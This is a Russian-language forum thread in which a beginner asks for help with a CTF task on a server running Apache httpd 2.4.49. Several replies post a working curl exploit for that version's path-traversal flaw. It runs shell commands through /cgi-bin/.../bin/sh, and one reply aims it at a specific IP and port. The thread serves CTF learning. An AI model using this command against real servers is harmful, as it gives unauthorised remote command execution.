 |
28.11.2023, 19:06
|
|
Новичок
Регистрация: 25.11.2023
Сообщений: 0
С нами:
1300336
Репутация:
0
|
|
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
|
|
|
28.11.2023, 20:02
|
|
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами:
2086530
Репутация:
0
|
|
Jacob Guitarrero сказал(а):
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
CVEшку не заюзать ?
Bash:
Код:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
|
|
|
|
28.11.2023, 22:01
|
|
Новичок
Регистрация: 25.11.2023
Сообщений: 0
С нами:
1300336
Репутация:
0
|
|
Exited3n сказал(а):
CVEшку не заюзать ?
Bash:
Код:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
|
|
|
|
28.11.2023, 22:30
|
|
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами:
2086530
Репутация:
0
|
|
Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
Честно сказать даже не знаю что посоветовать.
Основы изучи, прям с азов рекомендую начать.
Начни с того что забей в поисковик - curl и почитай про данный инструмент, что делает, как запускается и т.д.
|
|
|
|
29.11.2023, 10:50
|
|
Новичок
Регистрация: 02.03.2017
Сообщений: 0
С нами:
4841507
Репутация:
0
|
|
Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
судя по вопросу, найни с изучения Пингвина
P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
|
|
|
|
29.11.2023, 18:38
|
|
Новичок
Регистрация: 25.11.2023
Сообщений: 0
С нами:
1300336
Репутация:
0
|
|
GoBL1n сказал(а):
судя по вопросу, найни с изучения Пингвина
P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
самое собой изучать его, но этого не достаточно для решения данной задачи
|
|
|
|
29.11.2023, 22:25
|
|
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами:
2086530
Репутация:
0
|
|
Jacob Guitarrero сказал(а):
самое собой изучать его, но этого не достаточно для решения данной задачи
Серьезно ?
Код:
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
И так, считаем утилиты - curl, echo, whoami, id, cat
Целых 5 штук! Причем база базой.
|
|
|
|
30.12.2024, 01:47
|
|
Новичок
Регистрация: 20.05.2024
Сообщений: 0
С нами:
1046281
Репутация:
0
|
|
Exited3n сказал(а):
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
Можно и без Content-Type:
Bash:
Код:
curl
'62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo; whoami && id && cat /etc/os-release'
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
